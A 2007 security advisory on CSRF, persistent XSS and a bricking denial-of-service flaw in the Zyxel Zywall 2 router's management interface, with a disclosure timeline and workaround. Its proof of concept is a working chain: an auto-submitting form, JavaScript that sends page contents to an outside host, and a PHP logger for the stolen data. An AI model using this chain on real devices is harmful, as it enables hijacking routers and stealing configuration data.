The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Zyxel Zywall 2 Multiple Vulnerabilities
------------------------------------------------------------------------
SUMMARY
During an audit of Zyxel Zywall 2 it was discovered that a cross site
request forgery and persistent cross site scripting vulnerability exists
in the management interface. Thus, it is possible for an attacker to
perform any administrative actions in the management interface, if a
logged-in/authenticated user has been enticed to visit a malicious web
site. These actions include e.g. changing DNS server address or other
security critical configuration items.
It was also discovered that it is possible to "brick" the device by
submitting invalid configuration to the device, thus performing a
persistent denial of service attack against it.
DETAILS
Vulnerable Systems:
* ZyNOS Firmware version 3.62(WK.6) - 06/16/2004
Embedded device management interface does not validate the origin of an
HTTP request. If attacker is able to make an authenticated user visit a
hostile web page, a device can be controlled by submitting suitable forms.
It is possible to steal information from the device and modify the
configuration. See provided proof-of-concept code for more information.
Successful attack requires that the attacker knows the management
interface address for the target device. As the management interface is
most usually located at the default IP address and might even have default
password in place, performing an successful attack is not far fetched.
By submitting invalid configuration to the management interface it is
possible to perform a persistent denial of service attack against the
device. After receiving invalid configuration, the device will reboot and
enter an infinite reboot loop. Powering off the device, or pressing reset
button will not help. It has not been researched if the device can be
restored from this state (it does not have any reset jumpers or battery
powered memory). From an ordinary consumer's point-of-view, the device is
completely useless. No proof-of-concept code will be released, but finding
this vulnerability is trivial.
More information:
<http://en.wikipedia.org/wiki/Cross-site_request_forgery>
http://en.wikipedia.org/wiki/Cross-site_request_forgery
Proof of Concept:
Include a random user-specific token in forms.
Example form (exploits persistent XSS):
<html>
<body onload="document.CSRF.submit()">
<FORM name="CSRF" METHOD="POST"
ACTION="http://192.168.1.1/Forms/General_1";>
<INPUT NAME="sysSystemName" VALUE="<script src='http://nx.fi/X'>"
<INPUT NAME="sysDomainName" VALUE="evil.com">
<INPUT NAME="StdioTimout" VALUE="0">
<INPUT NAME="sysSubmit" VALUE="Apply">
</form>
</body>
</html>
X:
document.write("Security Updates - <a
href='http://www.checkpoint.com/'>http://www.zyxel.com</a>");
function getPage(){
i = 0;
data = encodeURIComponent(document.body.innerHTML);
while (i < data.length)
{
tmp = data.substr(i, 4096);
(new Image()).src = "http://nx.fi/xss/getinfo.php?page="; + tmp;
i += 4096;
}
}
setTimeout("getPage()", 1000);
getinfo.php:
<?php
$sent = isset($_REQUEST['page']);
$data = "";
if($sent)
{
$data .= "<pre>";
foreach($_REQUEST as $tmp) {
$data .= htmlspecialchars(urldecode($tmp));
}
$data .= "</pre>";
$myfile = "log.html";
$handle = fopen($myfile, 'a');
fwrite($handle, $data);
fclose($handle);
}
?>
Notice that you 'system name' variable is limited in length, so you'll
need a relatively short URL.
Workaround:
Change administration password and default IP address. Perform
administration using SSH.
Disclosure Timeline:
May 10 2007 - Contacted Zyxel by email
May 11 2007 - Vendor responded by email
June 7 2007 - Vendor stated that this not an urgent issue
June 28 2007 - Provided vendor with a proof-of-concept attack
August 10 2007 - Advisory released
ADDITIONAL INFORMATION
The information has been provided by <mailto:henri.lindberg@louhi.fi>
Henri Lindberg, Associate of (ISC).
The original article can be found at:
<http://www.louhi.fi/advisory/zyxel_070810.txt>
http://www.louhi.fi/advisory/zyxel_070810.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
